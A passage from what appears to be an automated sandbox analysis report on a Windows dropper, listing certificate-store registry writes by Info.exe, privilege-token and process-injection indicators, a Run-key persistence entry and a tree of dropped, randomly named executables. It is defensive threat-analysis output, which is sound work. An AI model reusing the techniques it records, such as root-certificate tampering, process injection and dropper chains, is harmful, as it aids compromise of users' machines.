f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Info.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Info.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d601030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Info.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5c0000000100000004000000000800001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c137e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Info.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Info.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exesvchost.exe4192468.exeInfo.exeInstallation.exex2BFjy8SRtdIV0VKlMSL7WDQ.exeWerFault.exeWerFault.exepid process 4492 rundll32.exe 4492 rundll32.exe 1152 svchost.exe 1152 svchost.exe 1308 4192468.exe 1308 4192468.exe 4308 Info.exe 4308 Info.exe 4940 Installation.exe 4940 Installation.exe 4940 Installation.exe 4940 Installation.exe 4940 Installation.exe 4940 Installation.exe 4940 Installation.exe 4940 Installation.exe 1152 svchost.exe 1152 svchost.exe 4504 x2BFjy8SRtdIV0VKlMSL7WDQ.exe 4504 x2BFjy8SRtdIV0VKlMSL7WDQ.exe 3024 3024 3024 3024 3024 3024 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 4672 WerFault.exe 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 5224 WerFault.exe 5224 WerFault.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
MicrosoftEdgeCP.exex2BFjy8SRtdIV0VKlMSL7WDQ.exepid process 4340 MicrosoftEdgeCP.exe 4504 x2BFjy8SRtdIV0VKlMSL7WDQ.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
KRSetp.exe7175645.exe6172656.exeMicrosoftEdge.exe4192468.exerundll32.exesvchost.exeMicrosoftEdgeCP.exesvchost.exedescription pid process Token: SeDebugPrivilege 3692 KRSetp.exe Token: SeDebugPrivilege 3356 7175645.exe Token: SeDebugPrivilege 1568 6172656.exe Token: SeDebugPrivilege 1108 MicrosoftEdge.exe Token: SeDebugPrivilege 1108 MicrosoftEdge.exe Token: SeDebugPrivilege 1108 MicrosoftEdge.exe Token: SeDebugPrivilege 1108 MicrosoftEdge.exe Token: SeDebugPrivilege 1308 4192468.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 1152 svchost.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4492 rundll32.exe Token: SeDebugPrivilege 4512 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4512 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4512 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4512 MicrosoftEdgeCP.exe Token: SeAssignPrimaryTokenPrivilege 2660 svchost.exe Token: SeIncreaseQuotaPrivilege 2660 svchost.exe Token: SeSecurityPrivilege 2660 svchost.exe Token: SeTakeOwnershipPrivilege 2660 svchost.exe Token: SeLoadDriverPrivilege 2660 svchost.exe Token: SeSystemtimePrivilege 2660 svchost.exe Token: SeBackupPrivilege 2660 svchost.exe Token: SeRestorePrivilege 2660 svchost.exe Token: SeShutdownPrivilege 2660 svchost.exe Token: SeSystemEnvironmentPrivilege 2660 svchost.exe Token: SeUndockPrivilege 2660 svchost.exe Token: SeManageVolumePrivilege 2660 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2660 svchost.exe Token: SeIncreaseQuotaPrivilege 2660 svchost.exe Token: SeSecurityPrivilege 2660 svchost.exe Token: SeTakeOwnershipPrivilege 2660 svchost.exe Token: SeLoadDriverPrivilege 2660 svchost.exe Token: SeSystemtimePrivilege 2660 svchost.exe Token: SeBackupPrivilege 2660 svchost.exe Token: SeRestorePrivilege 2660 svchost.exe Token: SeShutdownPrivilege 2660 svchost.exe Token: SeSystemEnvironmentPrivilege 2660 svchost.exe Token: SeUndockPrivilege 2660 svchost.exe Token: SeManageVolumePrivilege 2660 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2660 svchost.exe Token: SeIncreaseQuotaPrivilege 2660 svchost.exe Token: SeSecurityPrivilege 2660 svchost.exe Token: SeTakeOwnershipPrivilege 2660 svchost.exe Token: SeLoadDriverPrivilege 2660 svchost.exe Token: SeSystemtimePrivilege 2660 svchost.exe Token: SeBackupPrivilege 2660 svchost.exe Token: SeRestorePrivilege 2660 svchost.exe Token: SeShutdownPrivilege 2660 svchost.exe Token: SeSystemEnvironmentPrivilege 2660 svchost.exe Token: SeUndockPrivilege 2660 svchost.exe Token: SeManageVolumePrivilege 2660 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2660 svchost.exe Token: SeIncreaseQuotaPrivilege 2660 svchost.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 3024 3024 -
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeInstallation.exeBtk434tTOK06nw6mkoBp_n6Z.exev_6wCPhLcl2V_gdq2coOqIvq.exex2BFjy8SRtdIV0VKlMSL7WDQ.exeWdlRWF3gZ0pgsPt7bgSF6z9A.exeObvJhkjc1_yeOR8FBjF3Ixme.exedXBNAKqK98ZCDCS5MKKJLYPr.exeB5Zne25cheXMr5C6pGJaqOCd.exeN5awg6WF21NeZ4xqPl67lJoP.exeAcakfVHVK3ZpOKofv4SFb_LD.execustomer3.exemd8_8eus.exejfiag3g_gg.exeWerFault.exepid process 1108 MicrosoftEdge.exe 4340 MicrosoftEdgeCP.exe 4340 MicrosoftEdgeCP.exe 4940 Installation.exe 5588 Btk434tTOK06nw6mkoBp_n6Z.exe 5676 v_6wCPhLcl2V_gdq2coOqIvq.exe 5776 x2BFjy8SRtdIV0VKlMSL7WDQ.exe 5784 WdlRWF3gZ0pgsPt7bgSF6z9A.exe 5968 ObvJhkjc1_yeOR8FBjF3Ixme.exe 6020 dXBNAKqK98ZCDCS5MKKJLYPr.exe 5700 B5Zne25cheXMr5C6pGJaqOCd.exe 3940 N5awg6WF21NeZ4xqPl67lJoP.exe 2368 AcakfVHVK3ZpOKofv4SFb_LD.exe 420 customer3.exe 4764 md8_8eus.exe 5560 jfiag3g_gg.exe 4708 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
EB7233922891E1DAD0434FBD52623647.exeKRSetp.exe2464796.exeFolder.exerUNdlL32.eXerundll32.exesvchost.exeMicrosoftEdgeCP.exesvchost.exeInstallation.exedescription pid process target process PID 664 wrote to memory of 3692 664 EB7233922891E1DAD0434FBD52623647.exe KRSetp.exe PID 664 wrote to memory of 3692 664 EB7233922891E1DAD0434FBD52623647.exe KRSetp.exe PID 3692 wrote to memory of 3356 3692 KRSetp.exe 7175645.exe PID 3692 wrote to memory of 3356 3692 KRSetp.exe 7175645.exe PID 3692 wrote to memory of 1452 3692 KRSetp.exe 2464796.exe PID 3692 wrote to memory of 1452 3692 KRSetp.exe 2464796.exe PID 3692 wrote to memory of 1452 3692 KRSetp.exe 2464796.exe PID 3692 wrote to memory of 1308 3692 KRSetp.exe 4192468.exe PID 3692 wrote to memory of 1308 3692 KRSetp.exe 4192468.exe PID 3692 wrote to memory of 1308 3692 KRSetp.exe 4192468.exe PID 3692 wrote to memory of 1568 3692 KRSetp.exe 6172656.exe PID 3692 wrote to memory of 1568 3692 KRSetp.exe 6172656.exe PID 3692 wrote to memory of 1568 3692 KRSetp.exe 6172656.exe PID 1452 wrote to memory of 3832 1452 2464796.exe WinHoster.exe PID 1452 wrote to memory of 3832 1452 2464796.exe WinHoster.exe PID 1452 wrote to memory of 3832 1452 2464796.exe WinHoster.exe PID 664 wrote to memory of 4148 664 EB7233922891E1DAD0434FBD52623647.exe Folder.exe PID 664 wrote to memory of 4148 664 EB7233922891E1DAD0434FBD52623647.exe Folder.exe PID 664 wrote to memory of 4148 664 EB7233922891E1DAD0434FBD52623647.exe Folder.exe PID 4148 wrote to memory of 4252 4148 Folder.exe Folder.exe PID 4148 wrote to memory of 4252 4148 Folder.exe Folder.exe PID 4148 wrote to memory of 4252 4148 Folder.exe Folder.exe PID 664 wrote to memory of 4308 664 EB7233922891E1DAD0434FBD52623647.exe Info.exe PID 664 wrote to memory of 4308 664 EB7233922891E1DAD0434FBD52623647.exe Info.exe PID 664 wrote to memory of 4308 664 EB7233922891E1DAD0434FBD52623647.exe Info.exe PID 4464 wrote to memory of 4492 4464 rUNdlL32.eXe rundll32.exe PID 4464 wrote to memory of 4492 4464 rUNdlL32.eXe rundll32.exe PID 4464 wrote to memory of 4492 4464 rUNdlL32.eXe rundll32.exe PID 4492 wrote to memory of 1152 4492 rundll32.exe svchost.exe PID 4492 wrote to memory of 2768 4492 rundll32.exe svchost.exe PID 1152 wrote to memory of 4660 1152 svchost.exe svchost.exe PID 1152 wrote to memory of 4660 1152 svchost.exe svchost.exe PID 1152 wrote to memory of 4660 1152 svchost.exe svchost.exe PID 4492 wrote to memory of 1004 4492 rundll32.exe svchost.exe PID 4492 wrote to memory of 2460 4492 rundll32.exe svchost.exe PID 4492 wrote to memory of 2424 4492 rundll32.exe svchost.exe PID 4492 wrote to memory of 1096 4492 rundll32.exe svchost.exe PID 4492 wrote to memory of 932 4492 rundll32.exe svchost.exe PID 4492 wrote to memory of 1296 4492 rundll32.exe svchost.exe PID 4492 wrote to memory of 1764 4492 rundll32.exe svchost.exe PID 4492 wrote to memory of 1136 4492 rundll32.exe svchost.exe PID 4492 wrote to memory of 1344 4492 rundll32.exe svchost.exe PID 4492 wrote to memory of 2660 4492 rundll32.exe svchost.exe PID 4492 wrote to memory of 2688 4492 rundll32.exe svchost.exe PID 4340 wrote to memory of 4512 4340 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 4340 wrote to memory of 4512 4340 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 4340 wrote to memory of 4512 4340 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 4340 wrote to memory of 4512 4340 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 4872 wrote to memory of 4476 4872 svchost.exe Info.exe PID 4872 wrote to memory of 4476 4872 svchost.exe Info.exe PID 4872 wrote to memory of 4476 4872 svchost.exe Info.exe PID 664 wrote to memory of 4940 664 EB7233922891E1DAD0434FBD52623647.exe Installation.exe PID 664 wrote to memory of 4940 664 EB7233922891E1DAD0434FBD52623647.exe Installation.exe PID 664 wrote to memory of 4940 664 EB7233922891E1DAD0434FBD52623647.exe Installation.exe PID 1152 wrote to memory of 5160 1152 svchost.exe svchost.exe PID 1152 wrote to memory of 5160 1152 svchost.exe svchost.exe PID 1152 wrote to memory of 5160 1152 svchost.exe svchost.exe PID 4940 wrote to memory of 5588 4940 Installation.exe Btk434tTOK06nw6mkoBp_n6Z.exe PID 4940 wrote to memory of 5588 4940 Installation.exe Btk434tTOK06nw6mkoBp_n6Z.exe PID 4940 wrote to memory of 5588 4940 Installation.exe Btk434tTOK06nw6mkoBp_n6Z.exe PID 4940 wrote to memory of 5600 4940 Installation.exe Quu8x8ZMl6ldwF_wtPL3DLIm.exe PID 4940 wrote to memory of 5600 4940 Installation.exe Quu8x8ZMl6ldwF_wtPL3DLIm.exe PID 4940 wrote to memory of 5612 4940 Installation.exe oqNhLVxhlxKM6YjGsS_9x8pH.exe PID 4940 wrote to memory of 5612 4940 Installation.exe oqNhLVxhlxKM6YjGsS_9x8pH.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:1004
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1096
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1344
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1764
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2424
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2768
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2688
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2460
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1296
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1136
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:932
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe2⤵PID:6892
-
-
C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Users\Admin\AppData\Roaming\7175645.exe"C:\Users\Admin\AppData\Roaming\7175645.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3356 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3356 -s 19404⤵
- Program crash
PID:6196
-
-
-
C:\Users\Admin\AppData\Roaming\2464796.exe"C:\Users\Admin\AppData\Roaming\2464796.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:3832
-
-
-
C:\Users\Admin\AppData\Roaming\4192468.exe"C:\Users\Admin\AppData\Roaming\4192468.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Users\Admin\AppData\Roaming\6172656.exe"C:\Users\Admin\AppData\Roaming\6172656.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1568 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 21004⤵
- Program crash
PID:6748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a3⤵
- Executes dropped EXE
PID:4252
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4308 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
PID:4476
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Users\Admin\Documents\oqNhLVxhlxKM6YjGsS_9x8pH.exe"C:\Users\Admin\Documents\oqNhLVxhlxKM6YjGsS_9x8pH.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5612 -
C:\Users\Admin\Documents\oqNhLVxhlxKM6YjGsS_9x8pH.exeC:\Users\Admin\Documents\oqNhLVxhlxKM6YjGsS_9x8pH.exe4⤵
- Executes dropped EXE
PID:3544
-
-
-
C:\Users\Admin\Documents\Quu8x8ZMl6ldwF_wtPL3DLIm.exe"C:\Users\Admin\Documents\Quu8x8ZMl6ldwF_wtPL3DLIm.exe"3⤵
- Executes dropped EXE
PID:5600 -
C:\Users\Admin\AppData\Roaming\1390733.exe"C:\Users\Admin\AppData\Roaming\1390733.exe"4⤵
- Executes dropped EXE
PID:5660
-
-
C:\Users\Admin\AppData\Roaming\7550324.exe"C:\Users\Admin\AppData\Roaming\7550324.exe"4⤵
- Executes dropped EXE
PID:4772
-
-
C:\Users\Admin\AppData\Roaming\6180204.exe"C:\Users\Admin\AppData\Roaming\6180204.exe"4⤵
- Executes dropped EXE
PID:5064 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5064 -s 19205⤵
- Program crash
PID:6440
-
-
-
C:\Users\Admin\AppData\Roaming\3955826.exe"C:\Users\Admin\AppData\Roaming\3955826.exe"4⤵
- Executes dropped EXE
PID:2240
-
-
-
C:\Users\Admin\Documents\Btk434tTOK06nw6mkoBp_n6Z.exe"C:\Users\Admin\Documents\Btk434tTOK06nw6mkoBp_n6Z.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 6644⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:4672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 6524⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:5224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 6844⤵
- Program crash
PID:4700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 6524⤵
- Program crash
PID:5252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 10084⤵
- Program crash
PID:4784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 12204⤵
- Program crash
PID:4712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 12604⤵
- Program crash
PID:6052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 13244⤵
- Program crash
PID:5844
-
-
-
C:\Users\Admin\Documents\It7kGgbjATGQWRkcPZ4IaJpe.exe"C:\Users\Admin\Documents\It7kGgbjATGQWRkcPZ4IaJpe.exe"3⤵
- Executes dropped EXE
PID:5664 -
C:\Users\Admin\Documents\It7kGgbjATGQWRkcPZ4IaJpe.exe"C:\Users\Admin\Documents\It7kGgbjATGQWRkcPZ4IaJpe.exe"4⤵PID:6268
-
-
-
